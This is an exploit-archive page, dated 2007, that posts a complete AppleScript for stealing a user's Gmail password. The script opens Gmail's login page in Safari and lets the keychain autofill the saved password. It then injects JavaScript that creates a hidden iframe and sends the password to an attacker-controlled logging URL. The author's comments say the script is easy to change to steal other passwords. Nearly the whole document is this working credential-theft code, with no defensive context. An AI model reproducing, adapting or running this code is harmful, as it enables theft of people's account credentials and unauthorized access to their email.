Home / exploitsPDF  

gmailsteal_remote.scpt.txt

Posted on 30 September 2007

-- This script can be used to steal gmail's keychained password by injecting -- Javascripts into Safari. When executed it opens gmail's login page, reads -- saved password and sends it to a logging server by creating an hidden iframe -- into gmail's page. It can be easly modified to steal other pass. -- poplix papuasia.org -- http://px.dynalias.org -- 09-22-2007 --Your logging server set LOGGING_URL to "http://thief.dynalias.org/log.php?p=" --Creates an hidden iframe into google's login DIV set HIDDENFRAME to "document.getElementById('login').innerHTML+='<iframe id=steal width=0 height=0></iframe>'" --Stealing code set JSTEAL to "document.getElementById('steal').src='" & LOGGING_URL & "'+document.getElementById('gaia_loginform').Passwd.value" --Open gmail login page tell application "Safari" open location "https://www.google.com/accounts/ServiceLogin?service=mail" end tell --Wait loading... delay 10 --Create an hidden iframe to load LOGGING_URL tell application "Safari" do JavaScript HIDDENFRAME in document 1 end tell delay 1 --Send password to LOGGING_URL tell application "Safari" do JavaScript JSTEAL in document 1 end tell

 

TOP